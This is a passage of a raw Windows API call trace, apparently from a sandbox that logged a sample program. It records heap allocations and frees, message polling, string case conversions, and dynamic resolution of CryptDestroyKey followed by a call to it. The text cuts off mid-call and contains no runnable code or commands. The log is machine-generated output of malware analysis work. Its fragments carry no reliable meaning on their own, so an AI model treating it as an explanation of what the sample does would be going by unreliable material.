[0189.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.146] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0189.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0189.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.147] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.147] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.147] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.148] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.148] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x34aa658, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.149] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0189.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.150] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.152] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.153] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.153] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.153] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.154] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.154] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.154] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0189.154] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.155] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.156] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.156] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0189.157] RtlAllocateHeap 